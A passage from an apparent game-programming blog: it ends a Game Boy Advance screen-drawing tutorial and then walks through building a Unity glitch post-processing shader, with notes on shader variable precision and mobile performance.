<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">SCREEN_W</span> <span class="o">*</span> <span class="n">SCREEN_H</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">SCREENBUFFER</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">MakeCol</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="n">x</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vsync</span><span class="p">();</span>
<span class="n">drawRect</span><span class="p">(</span><span class="n">x</span> <span class="o">%</span> <span class="n">SCREEN_W</span><span class="p">,</span> <span class="p">(</span><span class="n">x</span> <span class="o">/</span> <span class="n">SCREEN_W</span><span class="p">)</span> <span class="o">*</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span><span class="n">MakeCol</span><span class="p">(</span><span class="mi">31</span><span class="p">,</span><span class="mi">31</span><span class="p">,</span><span class="mi">31</span><span class="p">));</span>
<span class="n">x</span> <span class="o">+=</span> <span class="mi">10</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>If you run this, you’ll slowly see your screen get filled, 10 pixels at a time, by a lovely white color:</p>
<div align="center">
<img src="/images/post_images/2017-03-31/fill.gif" style="width:240px;height:160px" />
<br /><br />
</div>
<p>You’ll notice that the screen doesn’t do any clearing for us at all. This is actually good news, since writing to the SCREENBUFFER array takes up cycles, and we don’t want our hardware using up any of our precious CPU time that it doesn’t have to. This means that if you wanted to say, move a rectangle across the screen instead of having the screen fill up, you also need to write black to the previous location of the rectangle:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vsync</span><span class="p">();</span>
<span class="k">if</span> <span class="p">(</span><span class="n">x</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">// erase the rectangle we drew last frame</span>
<span class="kt">int</span> <span class="n">last</span> <span class="o">=</span> <span class="n">x</span> <span class="o">-</span> <span class="mi">10</span><span class="p">;</span>
<span class="n">drawRect</span><span class="p">(</span><span class="n">last</span> <span class="o">%</span> <span class="n">SCREEN_W</span><span class="p">,</span> <span class="p">(</span><span class="n">last</span> <span class="o">/</span> <span class="n">SCREEN_W</span><span class="p">)</span> <span class="o">*</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span><span class="n">MakeCol</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">));</span>
<span class="p">}</span>
<span class="c1">// wrap before drawing, so we never draw below the bottom row</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">x</span> <span class="o">>=</span> <span class="n">SCREEN_W</span> <span class="o">*</span> <span class="p">(</span><span class="n">SCREEN_H</span><span class="o">/</span><span class="mi">10</span><span class="p">))</span> <span class="n">x</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">drawRect</span><span class="p">(</span><span class="n">x</span> <span class="o">%</span> <span class="n">SCREEN_W</span><span class="p">,</span> <span class="p">(</span><span class="n">x</span> <span class="o">/</span> <span class="n">SCREEN_W</span><span class="p">)</span> <span class="o">*</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span><span class="n">MakeCol</span><span class="p">(</span><span class="mi">31</span><span class="p">,</span><span class="mi">31</span><span class="p">,</span><span class="mi">31</span><span class="p">));</span>
<span class="n">x</span> <span class="o">+=</span> <span class="mi">10</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>You’ll notice I also added a bit of logic to wrap the x value when it goes off the end of the screen. This gives you a lovely white rectangle which traverses each row on your screen. If it looks like the rectangle is skipping frames, make sure the “frameskip” option in your emulator isn’t turned on.</p>
<div align="center">
<img src="/images/post_images/2017-03-31/rect.gif" style="width:240px;height:160px" />
<br /><br />
</div>
<p>Note that the gif above IS skipping frames, because my gif capturing program only supports up to 30 fps, so if your game is as choppy as the gif, your frameskip option is turned on.</p>
<p>Other than that, you should be good to go!</p>
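<p>If it helps to see the position math from the loops above on its own, here’s a minimal sketch in plain C. The helper names (rect_col, rect_row, next_x) and RECT_SIZE are made up for this example, and it assumes the GBA’s 240x160 screen for SCREEN_W and SCREEN_H:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c">#define SCREEN_W 240   /* assumed: GBA screen width in pixels */
#define SCREEN_H 160   /* assumed: GBA screen height in pixels */
#define RECT_SIZE 10

/* x walks along every 10-pixel-tall row of the screen laid end to end. */
int rect_col(int x) { return x % SCREEN_W; }
int rect_row(int x) { return (x / SCREEN_W) * RECT_SIZE; }

/* Step forward one rectangle, wrapping as soon as the next row would be off screen. */
int next_x(int x)
{
    x += RECT_SIZE;
    if (x &gt;= SCREEN_W * (SCREEN_H / RECT_SIZE)) x = 0;
    return x;
}</code></pre></figure>
<p>With these numbers, the last visible rectangle sits at x = 3830 (column 230, row 150), and the step after that wraps back to 0.</p>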
<h2 id="wrap-up">Wrap Up</h2>
<p>Usually I’d talk about performance, but I haven’t figured out how to get a timer running on the GBA yet, so I really can’t, other than to say the snake game runs smoothly. I have no idea when I’ll post more about game boy stuff, since I have other projects that I want to get done, but hopefully this was helpful enough to get you started, and pointed you at some much more detailed resources!</p>
<p>If you’re interested in the Snake game that I made for GBA, all the source is available on github <a href="https://github.com/khalladay/GBASnake">here</a>.</p>
<p>As always, if you have any questions, comments, or cat gifs, send them my way <a href="https://twitter.com/khalladay">on Twitter!</a></p>
Fixeds, Floats and a Block Damage Effect2017-03-13T00:00:00+00:00http://kylehalladay.com/blog/tutorial/2017/03/13/GlitchFX-In-Unity<p>As you may have guessed from everything that I post, I love cheesy rendering effects, and no surprise, that means that I’m a big fan of cyberpunk games, especially ones that really go over the top with effects. As such, I thought I’d spend some time this weekend building a classic glitch effect:</p>
<div align="center">
<img src="/images/post_images/2017-03-13/preview.gif" /><br />
</div>
<p>It’s a very simple effect, but it’s also a perfect excuse to talk about using the correct precision for variables when writing shaders. In the <a href="http://kylehalladay.com/blog/tutorial/2017/02/21/Pencil-Sketch-Effect.html">last article I wrote</a>, I touched a bit on using texture formats that have enough precision for the data you’re storing in them; today I’m going to go over how to decide whether to use a fixed, half or float on a line-by-line basis when writing a shader.</p>
<p>That will come later, though. First, let’s go over how the glitch effect we’re building works:</p>
<h2 id="how-it-works">How It Works</h2>
<p>The first thing we’ll need to do is find some way to divide our screen up into rectangular regions, identified by a scalar value. You can do this with UV math right in the shader, but it’s much easier to play with if this is texture driven, so we’ll need to create a texture like the following:</p>
<div align="center">
<img src="/images/post_images/2017-03-13/gs_map.png" /><br />
</div>
<p>Since this texture identifies each block with a value between 0 and 1 (the intensity of the colour), we’ll pass a second value to our shader also between 0 and 1. As the shader executes, any fragment which is in a block that has a value less than our control value will sample the screen buffer using UVs which have had a constant value added to or subtracted from them. This will keep all texture samples within a block cohesive with each other, producing the effect we want:</p>
<div align="center">
<img src="/images/post_images/2017-03-13/offset_sample.PNG" /><br />
</div>
<p>If we use the grayscale image above, however, our UV offset will always be diagonal and in the same direction, which isn’t exactly what we want. So I’m going to use the R channel as our identifier channel, and put different random values into the GB channels of the noise texture, which we’ll use to drive our UV offsets:</p>
<div align="center">
<img src="/images/post_images/2017-03-13/col_map.png" /><br />
</div>
<p>(I wrote a quick tool to generate these types of maps, I’m not going to walk through building it, but you can grab it in the github repo <a href="https://github.com/khalladay/GlitchFX/blob/master/GlitchFX/Assets/GlitchFX/Editor/BlockDamageMapTool.cs">here</a>)</p>
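<p>This isn’t the tool from the repo, but the core idea fits in a few lines. Below is a rough sketch in plain C, assuming a uniform grid of square blocks and a throwaway random number generator; the Pixel struct and both function names are invented for the example:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c">#include &lt;stdint.h&gt;

/* Hypothetical RGB pixel, not a type from the original tool. */
typedef struct { uint8_t r, g, b; } Pixel;

/* Tiny LCG so the example is deterministic; any RNG would do. */
static uint32_t lcg_next(uint32_t *state)
{
    *state = *state * 1664525u + 1013904223u;
    return *state &gt;&gt; 24; /* top 8 bits: 0..255 */
}

/* Fill a w*h image with block-sized cells. Every pixel in a cell shares the
   same R (block identifier) and G/B (UV offset) values. */
void fill_block_map(Pixel *img, int w, int h, int block, uint32_t seed)
{
    for (int by = 0; by &lt; h; by += block)
    {
        for (int bx = 0; bx &lt; w; bx += block)
        {
            Pixel p;
            p.r = (uint8_t)lcg_next(&amp;seed);
            p.g = (uint8_t)lcg_next(&amp;seed);
            p.b = (uint8_t)lcg_next(&amp;seed);
            for (int y = by; y &lt; by + block &amp;&amp; y &lt; h; ++y)
                for (int x = bx; x &lt; bx + block &amp;&amp; x &lt; w; ++x)
                    img[y * w + x] = p;
        }
    }
}</code></pre></figure>
<p>The maps in the images above use rectangles of different sizes, which this sketch doesn’t attempt; it only shows the “one value per block” property that the shader relies on.</p>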
<p>Then we’ll modify the effect to randomly choose which blocks to glitch, so that we don’t end up with a predictable pattern of glitchiness (which…kinda looks the opposite of glitchy), and I’ll talk a bit about some things you can do to make the whole effect look a bit more convincing (imo), and different ways you can extend it. I’ll also sprinkle in some notes about optimization.</p>
<p>So let’s get started!</p>
<h2 id="getting-something-on-screen">Getting Something On Screen</h2>
<p>I always try to get something on screen as fast as possible when I work, both so that I can verify that my code is doing what I think it should be, and to make sure that what I’m building actually looks good. So let’s start this effect the same way, by just getting the glitch effect working and distorting the whole screen.</p>
<p>Like usual, we’re going to be making a post effect, so we need to start with a bit of scaffolding in C#. Unlike past articles, this effect is simple enough that we don’t need to set up any extra cameras; we just need to make sure that we blit to the screen using our effect material:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="p">[</span><span class="nf">RequireComponent</span><span class="p">(</span><span class="k">typeof</span><span class="p">(</span><span class="n">Camera</span><span class="p">))]</span>
<span class="k">public</span> <span class="k">class</span> <span class="nc">GlitchFX</span><span class="p">:</span> <span class="n">MonoBehaviour</span>
<span class="p">{</span>
<span class="k">public</span> <span class="kt">float</span> <span class="n">glitchAmount</span> <span class="p">=</span> <span class="m">0.0f</span><span class="p">;</span>
<span class="k">public</span> <span class="n">Texture2D</span> <span class="n">blockTexture</span><span class="p">;</span>
<span class="k">private</span> <span class="n">Shader</span> <span class="n">_glitchShader</span><span class="p">;</span>
<span class="k">private</span> <span class="n">Material</span> <span class="n">_glitchMat</span><span class="p">;</span>
<span class="k">void</span> <span class="nf">Start</span> <span class="p">()</span>
<span class="p">{</span>
<span class="n">_glitchShader</span> <span class="p">=</span> <span class="n">Shader</span><span class="p">.</span><span class="nf">Find</span><span class="p">(</span><span class="s">"Hidden/GlitchFX/GlitchFX_Shift"</span><span class="p">);</span>
<span class="n">_glitchMat</span> <span class="p">=</span> <span class="k">new</span> <span class="nf">Material</span><span class="p">(</span><span class="n">_glitchShader</span><span class="p">);</span>
<span class="n">_glitchMat</span><span class="p">.</span><span class="nf">SetTexture</span><span class="p">(</span><span class="s">"_GlitchMap"</span><span class="p">,</span> <span class="n">blockTexture</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">private</span> <span class="k">void</span> <span class="nf">OnRenderImage</span><span class="p">(</span><span class="n">RenderTexture</span> <span class="n">source</span><span class="p">,</span> <span class="n">RenderTexture</span> <span class="n">destination</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">Graphics</span><span class="p">.</span><span class="nf">Blit</span><span class="p">(</span><span class="n">source</span><span class="p">,</span> <span class="n">destination</span><span class="p">,</span> <span class="n">_glitchMat</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">void</span> <span class="nf">Update</span> <span class="p">()</span>
<span class="p">{</span>
<span class="n">glitchAmount</span> <span class="p">=</span> <span class="n">Mathf</span><span class="p">.</span><span class="nf">Clamp</span><span class="p">(</span><span class="n">glitchAmount</span><span class="p">,</span> <span class="m">0.0f</span><span class="p">,</span> <span class="m">1.0f</span><span class="p">);</span>
<span class="n">_glitchMat</span><span class="p">.</span><span class="nf">SetFloat</span><span class="p">(</span><span class="s">"_GlitchAmount"</span><span class="p">,</span> <span class="n">glitchAmount</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>We’ll revisit this script later on when we want to tweak the effect, but for now, this is all we’ll need to get going. Next up, we need to get our shader set up. I’m going to assume that you can set up most of the material file yourself, and skip right to the fragment shader. If you’re lost, the shader is also in the github repo <a href="">here</a></p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">fixed4</span> <span class="nf">frag</span> <span class="p">(</span><span class="n">v2f</span> <span class="n">i</span><span class="p">)</span> <span class="p">:</span> <span class="n">SV_Target</span>
<span class="p">{</span>
<span class="n">fixed2</span> <span class="n">glitch</span> <span class="p">=</span> <span class="p">(</span><span class="nf">tex2D</span><span class="p">(</span><span class="n">_GlitchMap</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">)).</span><span class="n">rg</span><span class="p">;</span>
<span class="n">fixed4</span> <span class="n">col</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span> <span class="p">+</span> <span class="n">glitch</span><span class="p">.</span><span class="n">rg</span><span class="p">);</span>
<span class="k">return</span> <span class="n">col</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Alright, now we’re cooking! If you run this now you should get a full screen of glitchy goodness! If you’re seeing weirdness around the edges of the blocks like this:</p>
<div align="center">
<img src="/images/post_images/2017-03-13/filtering.png" style="width:300px;height:250px;" /><br />
</div>
<p>Make sure that you’ve set your noise map texture to “point” filtering.</p>
<h2 id="optimization-notes-part-1">Optimization Notes Part 1</h2>
<p>While what we’re doing is very straightforward, it’s worth taking a minute to talk about a quick optimization point. Notice that I’m only keeping 2 channels from the texture sample. This is going to be very slightly faster than keeping all four channels, or grabbing just 1 channel and creating a fixed2 from that.</p>
<p>You can test this yourself the same way I did, and run the above post process effect 101 times per frame, like so:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">private</span> <span class="k">void</span> <span class="nf">OnRenderImage</span><span class="p">(</span><span class="n">RenderTexture</span> <span class="n">source</span><span class="p">,</span> <span class="n">RenderTexture</span> <span class="n">destination</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">RenderTexture</span> <span class="n">t</span> <span class="p">=</span> <span class="n">RenderTexture</span><span class="p">.</span><span class="nf">GetTemporary</span><span class="p">(</span><span class="n">source</span><span class="p">.</span><span class="n">width</span><span class="p">,</span> <span class="n">source</span><span class="p">.</span><span class="n">height</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="p">=</span> <span class="m">0</span><span class="p">;</span> <span class="n">i</span> <span class="p"><</span> <span class="m">50</span><span class="p">;</span> <span class="p">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">Graphics</span><span class="p">.</span><span class="nf">Blit</span><span class="p">(</span><span class="n">source</span><span class="p">,</span> <span class="n">t</span><span class="p">,</span> <span class="n">_glitchMat</span><span class="p">);</span>
<span class="n">Graphics</span><span class="p">.</span><span class="nf">Blit</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="n">source</span><span class="p">,</span> <span class="n">_glitchMat</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">Graphics</span><span class="p">.</span><span class="nf">Blit</span><span class="p">(</span><span class="n">source</span><span class="p">,</span> <span class="n">destination</span><span class="p">,</span> <span class="n">_glitchMat</span><span class="p">);</span>
<span class="n">RenderTexture</span><span class="p">.</span><span class="nf">ReleaseTemporary</span><span class="p">(</span><span class="n">t</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>On my iPhone 6, the performance impact was too small to see without doing something like the above, and even in the above stress test, we’re talking about a difference of about 2 ms. It’s not like your project will fail if you don’t know this technique, but small optimizations add up, especially when you’re trying to hit 60 fps on mobile.</p>
<p>So that covers the texture sample line, but I also mentioned that we’d pay special attention to the precision of variables in this post, so let’s talk about why the texture sample was stored in a fixed2, and not a float2, for instance. As we’ll see when we have more instructions to look at, it’s a matter of minimizing the number of times we need to cast our data to a different precision. Some functions take floats as args, so passing in a fixed will require it to be cast up into a higher precision type or vice versa.</p>
<p>It’s also worth looking at the glsl that will be generated by Unity’s shader compiler for the above shader:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">uniform</span> <span class="n">sampler2D</span> <span class="n">_MainTex</span><span class="p">;</span>
<span class="n">uniform</span> <span class="n">sampler2D</span> <span class="n">_GlitchMap</span><span class="p">;</span>
<span class="n">varying</span> <span class="n">highp</span> <span class="n">vec2</span> <span class="n">xlv_TEXCOORD0</span><span class="p">;</span>
<span class="k">void</span> <span class="nf">main</span> <span class="p">()</span>
<span class="p">{</span>
<span class="n">lowp</span> <span class="n">vec4</span> <span class="n">tmpvar_1</span><span class="p">;</span>
<span class="n">tmpvar_1</span> <span class="p">=</span> <span class="nf">texture2D</span> <span class="p">(</span><span class="n">_GlitchMap</span><span class="p">,</span> <span class="n">xlv_TEXCOORD0</span><span class="p">);</span>
<span class="n">highp</span> <span class="n">vec2</span> <span class="n">P_2</span><span class="p">;</span>
<span class="n">P_2</span> <span class="p">=</span> <span class="p">(</span><span class="n">xlv_TEXCOORD0</span> <span class="p">+</span> <span class="n">tmpvar_1</span><span class="p">.</span><span class="n">xy</span><span class="p">);</span>
<span class="n">lowp</span> <span class="n">vec4</span> <span class="n">tmpvar_3</span><span class="p">;</span>
<span class="n">tmpvar_3</span> <span class="p">=</span> <span class="nf">texture2D</span> <span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">P_2</span><span class="p">);</span>
<span class="n">gl_FragData</span><span class="p">[</span><span class="m">0</span><span class="p">]</span> <span class="p">=</span> <span class="n">tmpvar_3</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Notice that by default, sampler2Ds in CG code are turned into low precision samplers in GLSL by Unity. GLSL lowp, mediump and highp float precision qualifiers map to CG’s fixed, half and float datatypes. This means that if we used a float2 instead of a fixed2 to store the texture lookup, we’d need to cast the value returned by the tex2D call up into float precision. You can see this happen if you change glitch to a float2 and examine the GLSL again:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">uniform</span> <span class="n">sampler2D</span> <span class="n">_MainTex</span><span class="p">;</span>
<span class="n">uniform</span> <span class="n">sampler2D</span> <span class="n">_GlitchMap</span><span class="p">;</span>
<span class="n">varying</span> <span class="n">highp</span> <span class="n">vec2</span> <span class="n">xlv_TEXCOORD0</span><span class="p">;</span>
<span class="k">void</span> <span class="nf">main</span> <span class="p">()</span>
<span class="p">{</span>
<span class="n">highp</span> <span class="n">vec2</span> <span class="n">glitch_1</span><span class="p">;</span>
<span class="n">lowp</span> <span class="n">vec2</span> <span class="n">tmpvar_2</span><span class="p">;</span>
<span class="n">tmpvar_2</span> <span class="p">=</span> <span class="nf">texture2D</span> <span class="p">(</span><span class="n">_GlitchMap</span><span class="p">,</span> <span class="n">xlv_TEXCOORD0</span><span class="p">).</span><span class="n">xy</span><span class="p">;</span>
<span class="n">glitch_1</span> <span class="p">=</span> <span class="n">tmpvar_2</span><span class="p">;</span>
<span class="n">highp</span> <span class="n">vec2</span> <span class="n">P_3</span><span class="p">;</span>
<span class="n">P_3</span> <span class="p">=</span> <span class="p">(</span><span class="n">xlv_TEXCOORD0</span> <span class="p">+</span> <span class="n">glitch_1</span><span class="p">);</span>
<span class="n">lowp</span> <span class="n">vec4</span> <span class="n">tmpvar_4</span><span class="p">;</span>
<span class="n">tmpvar_4</span> <span class="p">=</span> <span class="nf">texture2D</span> <span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">P_3</span><span class="p">);</span>
<span class="n">gl_FragData</span><span class="p">[</span><span class="m">0</span><span class="p">]</span> <span class="p">=</span> <span class="n">tmpvar_4</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>This may look like a trivial change (in fact, the PowerVR Shader Editor doesn’t even recognize it as an extra instruction), but the performance impact of minimizing precision casts is very real. Again, I highly recommend you write some tests to try it out for yourself, using the same method as before (running it 100 times per frame). If you do, you’ll notice that the cost of an individual cast isn’t that high, but across a whole project, these costs can add up.</p>
<p>Also, since we’re not sampling from a half precision or floating point texture, there really isn’t anything to be gained from using anything but a fixed here. If you need to sample from one of those textures, you can add a suffix to your sampler2D uniform to get a half or full precision sampler:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">sampler2D_float</span> <span class="n">_GlitchMap</span><span class="p">;</span>
<span class="n">sampler2D_half</span> <span class="n">_GlitchMap</span><span class="p">;</span></code></pre></figure>
<p>Ok, that’s a lot of analysis for now, let’s do something a bit more flashy.</p>
<h2 id="finishing-the-glitch-effect">Finishing the Glitch Effect</h2>
<p>So far our post process shader is assuming that we want to distort the entire screen RIGHT NOW, but that isn’t how the glitch effect we want works. We want to distort different parts of the screen at different times.</p>
<p>I’m going to start by using the value of the red channel in our map as the noise value for the blocks. This will give us an effect that follows a predictable pattern, but it will be way more convincing than what we have now. Once this is working, we can worry about adding randomness.</p>
<p>So what we need to do is pass a float value to the shader, and compare the value of each block against this value. Blocks which have a value less than our passed in control value will use the offset UVs (appearing glitched), and blocks with a value greater than or equal to it will appear normal. This means that if we pass 1.0 as our control value, every block with a value below 1.0 will glitch.</p>
<p>If all GPUs were good at branching, this could be written like this:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">fixed4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">v2f</span> <span class="n">i</span><span class="p">)</span> <span class="p">:</span> <span class="n">SV_Target</span>
<span class="p">{</span>
<span class="n">fixed2</span> <span class="n">glitch</span> <span class="p">=</span> <span class="p">(</span><span class="nf">tex2D</span><span class="p">(</span><span class="n">_GlitchMap</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">)).</span><span class="n">rg</span><span class="p">;</span>
<span class="n">float2</span> <span class="n">uvShift</span> <span class="p">=</span> <span class="n">glitch</span><span class="p">.</span><span class="n">rg</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">glitch</span><span class="p">.</span><span class="n">r</span> <span class="p">>=</span> <span class="n">_GlitchAmount</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">uvShift</span> <span class="p">*=</span> <span class="m">0.0</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">fixed4</span> <span class="n">col</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="nf">frac</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">uv</span> <span class="p">+</span> <span class="n">uvShift</span><span class="p">));</span>
<span class="k">return</span> <span class="n">col</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>But since we can’t be sure what device this effect will need to run on, I’m going to replace the conditional with a bit of math that accomplishes the same thing:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">fixed4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">v2f</span> <span class="n">i</span><span class="p">)</span> <span class="p">:</span> <span class="n">SV_Target</span>
<span class="p">{</span>
<span class="n">fixed2</span> <span class="n">glitch</span> <span class="p">=</span> <span class="p">(</span><span class="nf">tex2D</span><span class="p">(</span><span class="n">_GlitchMap</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">)).</span><span class="n">rg</span><span class="p">;</span>
<span class="n">float2</span> <span class="n">uvShift</span> <span class="p">=</span> <span class="n">glitch</span><span class="p">.</span><span class="n">rg</span> <span class="p">*</span> <span class="nf">ceil</span><span class="p">(</span><span class="n">_GlitchAmount</span> <span class="p">-</span> <span class="n">glitch</span><span class="p">.</span><span class="n">r</span><span class="p">);</span>
<span class="n">fixed4</span> <span class="n">col</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span> <span class="p">+</span> <span class="n">uvShift</span><span class="p">);</span>
<span class="k">return</span> <span class="n">col</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>All we’re doing here is comparing our two values with a subtract and rounding up to the nearest whole number. This only works because we know that both numbers have the same range (0 to 1), so the difference always lies between -1 and 1 and ceil() can only produce -1, 0 or 1. That -1 is the edge case: if a block’s value in the glitch map is exactly 1.0 and _GlitchAmount is 0, the subtraction gives exactly -1, which ceil() leaves at -1. That would distort part of the image even when we want no glitching, which is obviously incorrect. I’m going to add a max to the calculation here to resolve this:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">float2</span> <span class="n">uvShift</span> <span class="p">=</span> <span class="n">glitch</span><span class="p">.</span><span class="n">rg</span> <span class="p">*</span> <span class="nf">ceil</span><span class="p">(</span><span class="nf">max</span><span class="p">(-</span><span class="m">0.99</span><span class="p">,</span><span class="n">_GlitchAmount</span> <span class="p">-</span> <span class="n">glitch</span><span class="p">.</span><span class="n">r</span><span class="p">));</span></code></pre></figure>
<p>In a real project though, you’ll want to pre-process your glitch map to make sure it doesn’t have any 1.0 blocks so that you can get rid of this extra instruction and save some performance.</p>
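<p>If you want to convince yourself that the math really does behave like the branch, it’s easy to poke at on the CPU. Here’s a small C sketch of the same calculation; glitch_mask is a name I’m making up for this example, and ceilf/fmaxf stand in for the shader’s ceil and max:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c">#include &lt;math.h&gt;

/* Returns 1.0f when the block should glitch, 0.0f when it should not.
   Both inputs are expected to be in the 0 to 1 range. */
float glitch_mask(float glitch_amount, float block_value)
{
    float diff = glitch_amount - block_value; /* somewhere in -1..1 */
    diff = fmaxf(-0.99f, diff);               /* keep ceil() from ever seeing exactly -1 */
    return ceilf(diff);                       /* 1 if diff is above 0, otherwise 0 */
}</code></pre></figure>
<p>A block value of 0.25 with a control value of 0.5 gives 1 (glitched), a block value of 0.75 gives 0, and the troublesome pair of block value 1.0 and control value 0.0 now gives 0 instead of -1.</p>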
<p>You may have noticed that if you run this right now, you get some weird colours in your glitched image. For me, this looked like way more brown than there should have been:</p>
<div align="center">
<img src="/images/post_images/2017-03-13/edge.PNG" style="width:300px; height:250px;" /><br />
</div>
<p>This is because when we add our UV offset to our UV coordinates, we’re ending up sampling from outside of the area of the screen buffer. The buffer is set to clamp at the border, meaning what we’re seeing is a lot of fragments picking up pixels from the edge of our image. Since we don’t care about the integer value of our UV coordinates (and in fact want to get rid of them), we can add a frac() function to our shader and get home-grown UV wrapping.</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">fixed4</span> <span class="n">col</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="nf">frac</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">uv</span> <span class="p">+</span> <span class="n">uvShift</span><span class="p">));</span></code></pre></figure>
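<p>frac() returns x - floor(x), so it wraps coordinates that fall off either side of the 0 to 1 range. A CPU-side equivalent in C, handy for sanity checking the wrapping (wrap_uv is a name made up for this sketch):</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c">#include &lt;math.h&gt;

/* Same definition the shader's frac() uses: x - floor(x). */
float wrap_uv(float x)
{
    return x - floorf(x);
}</code></pre></figure>
<p>A coordinate of 1.25 wraps around to 0.25, and a coordinate of -0.25 wraps to 0.75, so an offset block always ends up sampling from somewhere inside the screen buffer.</p>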
<p>Put all this together and you get an effect that looks like this as the _GlitchAmount value pans from 0 to 1:</p>
<div align="center">
<img src="/images/post_images/2017-03-13/pan3.gif" /><br />
</div>
<h2 id="optimization-notes-part-2">Optimization Notes Part 2</h2>
<p>We have another line of shader code now, so let’s talk about</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"> <span class="n">float2</span> <span class="n">uvShift</span> <span class="p">=</span> <span class="n">glitch</span><span class="p">.</span><span class="n">rg</span> <span class="p">*</span> <span class="nf">ceil</span><span class="p">(</span><span class="nf">max</span><span class="p">(-</span><span class="m">0.99</span><span class="p">,</span><span class="n">_GlitchAmount</span> <span class="p">-</span> <span class="n">glitch</span><span class="p">.</span><span class="n">r</span><span class="p">));</span></code></pre></figure>
<p>First of all, it’s almost always a bad idea to use anything but floats to hold UV coordinates. The other datatypes don’t have enough precision to accurately sample a texture, which is what you want them to do 99% of the time. We don’t really care about whether or not our shifted coordinates are super accurate though, so the question of what data type to use comes down to raw performance.</p>
<p>Boringly enough this doesn’t actually change anything, because _GlitchAmount is a float, and the tex2D() function expects the uv coordinates that get passed to it to be floats, so no matter what we start with, we very quickly need to cast our variable up to a float anyway, so we may as well keep to the standard rule of “uv math gets done in full precision” here too.</p>
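<p>To make the “not enough precision” point concrete, here’s a small C sketch. It assumes a fixed behaves like a value snapped to steps of 1/256, which is the figure Unity’s documentation gives for typical hardware; real GPUs vary, and both function names are made up for this example:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c">#include &lt;math.h&gt;

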